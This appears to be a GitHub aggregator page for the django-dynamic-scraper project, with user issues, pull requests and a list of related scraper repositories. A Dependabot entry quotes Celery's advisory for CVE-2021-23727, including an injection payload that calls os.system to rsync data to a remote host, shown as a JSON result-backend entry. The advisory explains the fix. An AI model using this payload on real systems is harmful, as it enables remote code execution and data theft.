Creating Scrapy scrapers via the Django admin interface

Overview

django-dynamic-scraper

Django Dynamic Scraper (DDS) is an app for Django which builds on top of the scraping framework Scrapy and lets you create and manage Scrapy spiders via the Django admin interface. It was originally developed for the German web TV program site http://fernsehsuche.de.

Documentation

Read more about DDS in the ReadTheDocs documentation:

Getting Help/Updates

There is a mailing list on Google Groups, feel free to ask questions or make suggestions:

News about releases and updates is posted on Twitter:

Comments
  • Allow the user to customize the scraper

    I am a newbie to web crawlers. I am going to build a Django web app in which users fill in a form (keywords, time, etc.) and submit it. The scraper will then start and crawl the data according to the user's requirements from a specific website (set by me). After that, the data will be passed to another model to do some clustering work. How can I do that?

    opened by ghost 11
  • Added FOLLOW pagination type.

    This only follows pages (dynamically) after crawling all of the links in the base page. If you have any interest in this PR, I can flesh out the implementation and docs.

    someday 
    opened by scott-coates 10
  • Add explicit on_delete argument to be compatible for Django 2.0.

    Django 2 requires explicit on_delete argument as per the following page.

    https://docs.djangoproject.com/en/2.0/releases/2.0/

    "The on_delete argument for ForeignKey and OneToOneField is now required in models and migrations. Consider squashing migrations so that you have fewer of them to update."

    This fix will suppress the Django 2.0 warnings in Django 1.x and fix the compatibility issue for Django 2.

    opened by ryokamiya 9
  • can't run python manage.py celeryd

    Running $ python manage.py celeryd -l info -B --settings=example_project.settings gives me this error: File "manage.py", line 10, in TypeError: invalid arguments

    My system info is as follows: Python 2.7, Celery 3.1.19, Django-celery 3.1.16. Django-celery is installed and shows up in the example_project Django admin page, but I get this error when running the example command. Any advice would be appreciated. Thanks.

    opened by ratha-pkh 8
  • New Django1.7 branch

    Here is a small contribution to adapt the package to Django 1.7 and Scrapy 0.24. It has not been heavily tested yet and probably needs additional feedback from the community, but it may help those who want to work in a more up-to-date environment.

    PS: note that this is my first PR, so it might not follow the general rules.

    opened by jice-lavocat 7
  • Installation Failure in Pillow req when Brew's JPEG package isn't installed

    The Pillow requirement that DDS attempts to install has a dependency on Brew's jpeg package and throws the following error when installed either directly from GitHub or via pip on OSX 10.13.4 with Python 3.6.4.

    ValueError: jpeg is required unless explicitly disabled using --disable-jpeg, aborting

    Pillow's OSX installation instructions detail how to add these dependencies: brew install libtiff libjpeg webp little-cms2

    opened by tom-price 5
  • Allow storing extra XPATHs / add another pagination option

    Currently only 5 XPATH types are stored — STANDARD, STANDARD_UPDATE, DETAIL, BASE and IMAGE. It would be good to have another section called EXTRA.

    Quite often I need to access an XPATH value that is not necessarily mapped to a model field. In my case, I need an additional XPATH for finding the next pagination link and have had to resort to using one of the other fields as a hack.

    opened by mridang 5
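The "next pagination link" idea in the request above can be sketched outside of DDS. The following is a minimal illustration only, not DDS code: the `PAGES` data, the `follow_pagination` helper, and both XPath expressions are hypothetical, and well-formed XML stands in for real HTML so that the standard library parser can be used.

```python
import xml.etree.ElementTree as ET

# Hypothetical listing pages keyed by URL (assumption: well-formed markup).
PAGES = {
    "/list?page=1": "<html><body><a class='item' href='/a/1'>A1</a>"
                    "<a class='next' href='/list?page=2'>Next</a></body></html>",
    "/list?page=2": "<html><body><a class='item' href='/a/2'>A2</a>"
                    "<a class='next' href='/list?page=3'>Next</a></body></html>",
    "/list?page=3": "<html><body><a class='item' href='/a/3'>A3</a></body></html>",
}


def follow_pagination(start_url, pages, next_xpath=".//a[@class='next']", max_pages=50):
    """Collect item links page by page, following the 'next' link until it is missing."""
    items, seen, url = [], set(), start_url
    while url is not None and url not in seen and len(seen) < max_pages:
        seen.add(url)  # guard against pagination loops
        root = ET.fromstring(pages[url])
        items.extend(a.get("href") for a in root.findall(".//a[@class='item']"))
        next_link = root.find(next_xpath)  # the extra XPath, not mapped to any field
        url = next_link.get("href") if next_link is not None else None
    return items


print(follow_pagination("/list?page=1", PAGES))
```

The point of the sketch is that the "next" XPath is configuration separate from the item fields, which is what an EXTRA XPath type would make possible.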
  • Question: IN/ACTIVE status on NewsWebsite?

    Hello,

    Quick newbie question: I have a use case with 3 NewsWebsite entries that all scrape the same domain URL, with only the keyword differing, like the following:

    NewsWebsite 1 url is "http://www.somewebsite.com/?q=keyword1", NewsWebsite 2 url is "http://www.somewebsite.com/?q=keyword2", etc.

    This way I can filter by keyword in the Article admin and only need to create 1 scraper for all of them. However, I notice the IN/ACTIVE status is on the scraper, so setting the scraper to INACTIVE stops scraping for all NewsWebsite entries when I actually only need to disable scraping for one keyword. Is there a way to accomplish this in DDS?

    Cheers

    opened by senoadiw 4
  • pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    Hi,

    I'm stuck on this problem. I configured an example similar to the startup project, providing a detail page with 'pre_url': 'http://www.website.com'. I want it to scrape the listing every hour (using crontab) and add any new articles.

    When I run the command for the first time (Article table empty), it populates the items correctly. However, if I run the command again after a new article has been added (with scrapy crawl article_spider -a id=2 -a do_action=yes) and the Article table is already populated, it does scrape the page but doesn't add the new articles:

    2016-08-27 10:33:45 [scrapy] ERROR: Error downloading <GET doublehttp://www.website.com/politique/318534.html>
    Traceback (most recent call last):
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 1126, in _inlineCallbacks
        result = result.throwExceptionIntoGenerator(g)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/python/failure.py", line 389, in throwExceptionIntoGenerator
        return g.throw(self.type, self.value, self.tb)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/middleware.py", line 43, in process_request
        defer.returnValue((yield download_func(request=request,spider=spider)))
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/utils/defer.py", line 45, in mustbe_deferred
        result = f(*args, **kw)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/handlers/__init__.py", line 64, in download_request
        (scheme, self._notconfigured[scheme]))
    NotSupported: Unsupported URL scheme 'doublehttp': no handler available for that scheme
    2016-08-27 10:33:45 [scrapy] INFO: Closing spider (finished)
    

    I searched for this "doublehttp" scheme error but couldn't find anything useful.

    Versions I have:

    Twisted==16.3.2 Scrapy==1.1.2 scrapy-djangoitem==1.1.1 django-dynamic-scraper==0.11.2

    URL in DB (for an article) -

    http://www.website.com/politique/318756.html

    scraped URL without pre_url -

    /politique/318756.html

    Any hint ?

    Thank you for your consideration and for this great project.

    opened by Akramz 4
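The report above contrasts a stored absolute URL with a scraped relative path. As a general illustration of how a prefix can be applied without ever doubling the scheme, here is a minimal sketch. It is not DDS's implementation, and the report does not establish what DDS does internally; `apply_pre_url` is a hypothetical helper name.

```python
from urllib.parse import urljoin, urlsplit


def apply_pre_url(url, pre_url):
    """Return an absolute URL, joining with pre_url only when url has no scheme."""
    if urlsplit(url).scheme:
        # Already absolute (for example, read back from the database): leave untouched.
        return url
    return urljoin(pre_url, url)


# Relative path as scraped from the listing page.
print(apply_pre_url("/politique/318756.html", "http://www.website.com"))
# Absolute URL as stored in the DB.
print(apply_pre_url("http://www.website.com/politique/318756.html", "http://www.website.com"))
```

Both calls yield the same absolute URL, so the function is safe to apply more than once to the same value.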
  • loaddata of example got errors

    I configured the example. When I run python manage.py loaddata open_news/open_news.json I get the errors below:

    $ python manage.py loaddata open_news/open_news.json
    Problem installing fixture 'open_news/open_news.json':
    Traceback (most recent call last):
      File "/usr/lib64/python2.7/site-packages/django/core/management/commands/loaddata.py", line 196, in handle
        obj.save(using=using)
      File "/usr/lib64/python2.7/site-packages/django/core/serializers/base.py", line 165, in save
        models.Model.save_base(self.object, using=using, raw=True)
      File "/usr/lib64/python2.7/site-packages/django/db/models/base.py", line 551, in save_base
        result = manager._insert([self], fields=fields, return_id=update_pk, using=using, raw=raw)
      File "/usr/lib64/python2.7/site-packages/django/db/models/manager.py", line 203, in _insert
        return insert_query(self.model, objs, fields, **kwargs)
      File "/usr/lib64/python2.7/site-packages/django/db/models/query.py", line 1576, in insert_query
        return query.get_compiler(using=using).execute_sql(return_id)
      File "/usr/lib64/python2.7/site-packages/django/db/models/sql/compiler.py", line 910, in execute_sql
        cursor.execute(sql, params)
      File "/usr/lib64/python2.7/site-packages/django/db/backends/util.py", line 40, in execute
        return self.cursor.execute(sql, params)
      File "/usr/lib64/python2.7/site-packages/django/db/backends/sqlite3/base.py", line 337, in execute
        return Database.Cursor.execute(self, query, params)
    IntegrityError: Could not load contenttypes.ContentType(pk=25): columns app_label, model are not unique

    What's wrong with it ?

    opened by gorf 4
  • DDS unusable with django >= 1.10

    Django 1.11.1: we are unable to add a request page type (screenshot 2017-05-14 16 34 55)

    Django 1.9.7: we are able to add a request page type (screenshot 2017-05-14 16 36 26)

    It looks like a problem with the registration of the inline form for the request page type.

    DDS version in both cases - 0.12

    opened by tigrus 3
  • Bump celery from 3.1.25 to 5.2.2

    Bumps celery from 3.1.25 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
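The guard described in the release note (refusing to re-raise when the recreated type is not an exception) can be illustrated with a short sketch. This is not Celery's code; `rebuild_exception` is a hypothetical helper that mimics reconstructing an exception from a stored payload shaped like the example above.

```python
import importlib


def rebuild_exception(payload):
    """Recreate an exception instance from a stored failure payload.

    Assumption: payload has the keys exc_module, exc_type and exc_message.
    """
    module = importlib.import_module(payload["exc_module"])
    exc_type = getattr(module, payload["exc_type"])
    # The essential check: only real exception classes may be instantiated.
    # Without it, a callable such as os.system would be invoked with the message.
    if not (isinstance(exc_type, type) and issubclass(exc_type, BaseException)):
        raise ValueError(
            "refusing to rebuild %s.%s: not an exception class"
            % (payload["exc_module"], payload["exc_type"])
        )
    return exc_type(payload["exc_message"])


ok = rebuild_exception(
    {"exc_module": "builtins", "exc_type": "KeyError", "exc_message": "missing"}
)
print(type(ok).__name__)
```

With the check in place, a payload naming `os` and `system` is rejected before anything is called.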

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    dependencies 
    opened by dependabot[bot] 0
  • New Scrapy Support List

    I will use this thread to report my tests with new Scrapy releases that DDS doesn't support at the moment. Keep in mind that I use a modified version of DDS 0.13.3, but I think that if they work for me, they'll work with the original DDS 0.13.3 too.

    Scrapy 1.6.0 works fine, Scrapy 1.8.0 works fine

    opened by bezkos 0
  • How can I save crawled data in multi model?

    Hi, thanks for DDS. I want to crawl items from a website and keep a history of some fields (like price). I made a separate model, connected it to the main model, and in the pipeline I insert the price into the price model when a crawled item is saved to the DB, and that works. How can I add a new price to the price model when the price changes?

    opened by relaxdevvv 0
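One common way to approach the question above is to compare each newly scraped price with the most recent stored one and append only on change. The sketch below shows that logic with plain Python objects; `Item`, `price_history`, and `record_price` are hypothetical names, and in a Django project the list would presumably be a related price model queried from the pipeline.

```python
from dataclasses import dataclass, field
from decimal import Decimal


@dataclass
class Item:
    """Stand-in for the main model; price_history stands in for the related price model."""
    name: str
    price_history: list = field(default_factory=list)


def record_price(item, new_price):
    """Append new_price to the history only if it differs from the latest entry."""
    new_price = Decimal(str(new_price))
    if item.price_history and item.price_history[-1] == new_price:
        return False  # unchanged: keep the history as it is
    item.price_history.append(new_price)
    return True


book = Item("example item")
for scraped in ["9.99", "9.99", "8.49"]:
    record_price(book, scraped)
print(book.price_history)
```

Repeated crawls that see the same price leave the history untouched, so each entry marks an actual change.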
  • Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    I started using the django dynamic scraper for my personal project.

    I created my scrapers as I should and everything works when I run scrapy crawl in a terminal. Now I want to use django celery to schedule scraping. I followed everything in the tutorial (created a periodic task, ran celeryd, ran scrapyd, deployed the scrapy project, changed the scraper status to ACTIVE in the UI).

    The very first time it runs, I can see that a process is spawned in the scrapyd server. It runs once and never runs again, even when I define a new periodic task.

    Celery keeps sending tasks, but all I see in the scrapyd is the following log: 2020-11-19T12:18:36+0200 [twisted.python.log#info] "127.0.0.1" - - [19/Nov/2020:10:18:36 +0000] "GET /listjobs.json?project=default HTTP/1.1" 200 93 "-" "Python-urllib/2.7"

    I tried to deactivate dynamic scheduling as explained in the documentation but it still does not work. My tasks are spawned only once and I can't work that way.

    If someone has already run into this issue, I would highly appreciate the help.

    opened by benjaminelkrieff 0
  • Dynamically change the url of the "Website" component

    Hi everyone.

    I am working on a project in which I want multiple URLs to be scraped by the same scraper. For example, let's say I want to scrape social media profiles. I want to scrape the name and the profile picture, so I define just one scraper for this use case.

    Let's say I have the profile URLs of 10000 people. How can I scrape all of these URLs without defining 10000 websites in the Django admin?

    Currently, what I see is that I can define one website with one hardcoded URL, link it to a scraper, and call the scrapy command tool with the website ID. But it doesn't give me any option to change the URL dynamically.

    I can't believe that there is no such option and that's why I am asking the community if there is such an option or if I can define this specific mechanism at the model level.

    Thank you

    opened by benjaminelkrieff 0
Releases(v0.13.2)
🤖 Threaded Scraper to get discord servers from disboard.org written in python3

Disboard-Scraper Threaded Scraper to get discord servers from disboard.org written in python3. Setup. One thread / tag If you want to look for multip

Ѵιcнч 11 Nov 01, 2022
Simple tool to scrape and download cross country ski timings and results from live.skidor.com

LiveSkidorDownload Simple tool to scrape and download cross country ski timings and results from live.skidor.com Usage: Put the python file in a dedic

0 Jan 07, 2022
Command line program to download documents from web portals.

command line document download made easy Highlights list available documents in json format or download them filter documents using string matching re

16 Dec 26, 2022
Examine.com supplement research scraper!

ExamineScraper Examine.com supplement research scraper! Why I want to be able to search pages for a specific term. For example, I want to be able to s

Tyler 15 Dec 06, 2022
Meme-videos - Scrapes memes and turns them into video compilations

Meme Videos Scrapes memes from reddit using praw and request and then converts t

Partho 12 Oct 28, 2022
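JD.com Moutai flash-sale purchasing

As of 2021/2/1, this project no longer works! JD.com: reservations close once full; purchasing is limited to the app for JD.com users with real-name verification; reservations open at 10:00 on February 1 and the sale starts at 12:00 on February 1 (the JD.com app must be upgraded to version 8.5.6 or later). Foreword: this project comes from huanghyw - jd_seckill; I can't find the author's project URL and will post it once I do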

abee 73 Dec 03, 2022
Web Scraping images using Selenium and Python

Web Scraping images using Selenium and Python About this document This is a markdown document about Web scraping images and videos using Selenium

Nafaa BOUGRAINE 3 Jul 01, 2022
A Pixiv web crawler module

Pixiv-spider A Pixiv spider module WARNING It's an unfinished work; browse the code carefully before using it. Features 0004 - Readme.md updated, co

Uzuki 1 Nov 14, 2021
A Python package that scrapes Google News article data while remaining undetected by Google.

A Python package that scrapes Google News article data while remaining undetected by Google. Our scraper can scrape page data up until the last page and never trigger a CAPTCHA (download stats: https

Geminid Systems, Inc 6 Aug 10, 2022
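Automatically completes tasks, checks in, and claims data and points in the China Unicom mobile app.

Automatically completes daily tasks in the China Unicom mobile app, claiming data and checking in for points, so you need not worry about running out of data at the end of the month. Features: Wo Tree data claiming and watering (12 MB of daily data); daily check-in (1 point + 4 points when doubled + a 1 GB daily data pack on the seventh day); daily lottery with three free chances per day (random rewards); daily check-in at the game center (consecutive check-ins, points increasing up to a maximum of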

2k May 06, 2021
Create crawler get some new products with maximum discount in banimode website

crawler-banimode create crawler and get some new products with maximum discount in banimode website. This small project is for learning and working with the Selenium tool

nourollah rezaei 2 Feb 17, 2022
Simple library for exploring/scraping the web or testing a website you’re developing

Robox is a simple library with a clean interface for exploring/scraping the web or testing a website you’re developing. Robox can fetch a page, click on links and buttons, and fill out and submit for

Dan Claudiu Pop 79 Nov 27, 2022
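Latest optimized version of Taobao Moutai purchasing; Taobao Moutai flash sale, with an optimized purchase thread queue

Latest optimized version of Taobao Moutai purchasing; Taobao Moutai flash sale, with an optimized purchase thread queue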

MaoTai 118 Dec 16, 2022
Ebay Webscraper for Getting Average Product Price

Ebay-Webscraper-for-Getting-Average-Product-Price The code in this repo is used to determine the average price of an item on Ebay given a valid search

17 Jan 05, 2023
A Web Scraper built with beautiful soup, that fetches udemy course information. Get udemy course information and convert it to json, csv or xml file

Udemy Scraper A Web Scraper built with beautiful soup, that fetches udemy course information. Installation Virtual Environment Firstly, it is recommen

Aditya Gupta 15 May 17, 2022
Shopee Scraper - A web scraper in python that extracts sales, price, available stock, location and more of a given seller in Brazil

Shopee Scraper A web scraper in python that extracts sales, price, available stock, location and more of a given seller in Brazil. The project was crea

Paulo DaRosa 5 Nov 29, 2022
Footballmapies - Football mapies for learning webscraping and use of gmplot module in python

Footballmapies - Football mapies for learning webscraping and use of gmplot module in python

1 Jan 28, 2022
Scrapy-soccer-games - Scraping information about soccer games from a few websites

scrapy-soccer-games The purpose of this project is to collect table information

Caio Alves 2 Jul 20, 2022
A tool to easily scrape youtube data using the Google API

YouTube data scraper To easily scrape any data from the youtube homepage, a youtube channel/user, search results, playlists, and a single video itself

7 Dec 03, 2022
TikTok Username Swapper/Claimer/etc

TikTok-Turbo TikTok Username Swapper/Claimer/etc I wanted to create it as fast as possible but i eventually gave up and recoded it many many many many

Kevin 12 Dec 19, 2022